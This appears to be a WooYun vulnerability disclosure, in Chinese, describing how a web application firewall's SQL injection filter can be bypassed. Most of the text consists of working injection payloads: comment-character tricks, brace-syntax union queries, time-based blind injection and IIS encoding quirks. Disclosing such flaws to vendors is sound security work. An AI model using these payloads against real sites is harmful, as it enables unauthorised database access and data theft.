WooYun.org

First:
对#的处理问题:
因为#是注释符，在语法分析中对此符号没有做好处理导致可被绕过。
例如提交即可绕过:
test%23aaa' union select user(),2;

只要我们在字符串中包含#这个字符就可以导致waf失效！这是非常严重的。。。
Second:
直接select{x user}from{x admin}这样是不行的
但是fuzz了一下：
这样可以绕过：select{x user}from{1d admin}
union:
union select (select{x user}from{1d admin}+limit+1),1
盲注：
1' and if(ascii(substr((select{1d user()}),1,1))>11,sleep(1),1)
同理报错注入也是可以的！
关键点在1d这个地方！同样一点错误导致waf完全被绕过！
注入的判断：
and--!!!1=- -!!!1
and--!!!1=- -!!!0
or：
%26%261=1
%26%261=0
||1=1
还有些数据库特性：
1）：iis在asp程序处理中对于%的处理
2）：iis在aspx程序处理中对于%u00的处理
3）：select 1,2,3,4 from dual where id =1[]union[]select[]1,2,3,4 from[]

一些小问题,感觉这样防御有点暴力：